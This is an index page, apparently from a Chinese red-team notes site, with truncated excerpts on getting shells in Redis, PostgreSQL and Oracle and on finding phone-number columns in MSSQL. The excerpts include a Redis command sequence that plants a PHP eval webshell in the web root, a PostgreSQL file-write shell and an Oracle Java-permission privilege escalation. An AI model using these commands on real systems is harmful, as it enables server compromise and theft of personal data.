- 简介
- 目录大纲
- 最新文档
查询关键字段记录数量
目标:==根据系统视图联合查询包含phone字段的列名、数据量大于阈值、表名、schema、数据库名,并按数据量排序。== 返回数据格式:schema-table-column-rows mssql sql SELECT t.TABLE_SCHEMA as 'TABLE_SCHEMA',a.name as 'TABLE_NAME', c.COLUMN_NAME, b.rows FROM sysob……
admin - 2022年3月13日 20:16
Redis
GetShell 写webshell 已知web的绝对路径 对应目录具有读写权限 redis-cli -h 192.168.1.154 config set dir /var/www/html set xxx "\n\n\n<?php@eval($_POST['c']);?>\n\n\n" config set dbfilename webshell.php save……
admin - 2022年3月13日 20:13
PostgreSQL
GetShell copy to写shell 拥有网站路径写入权限 知道网站绝对路径 copy (select '<?php phpinfo();?>') to '/tmp/1.php'; lo_create写shell 利用分片进行上传,首先创建一个 OID 作为写入的对象, 然后通过 0,1,2,3… 分片上传但是对象都为 12345 最后导出到 / tmp 目录下, 收尾删……
admin - 2022年3月13日 20:13
Oracle
GetShell Vuln Privilege Escalation 创建java函数提权 dba权限 使用sqlplus连接 system/system@192.168.117.66:1521/orcl 赋权 begin dbms_java.grant_permission( 'PUBLIC', 'SYS:java.io.FilePermission', '<<ALL ……
admin - 2022年3月13日 20:12
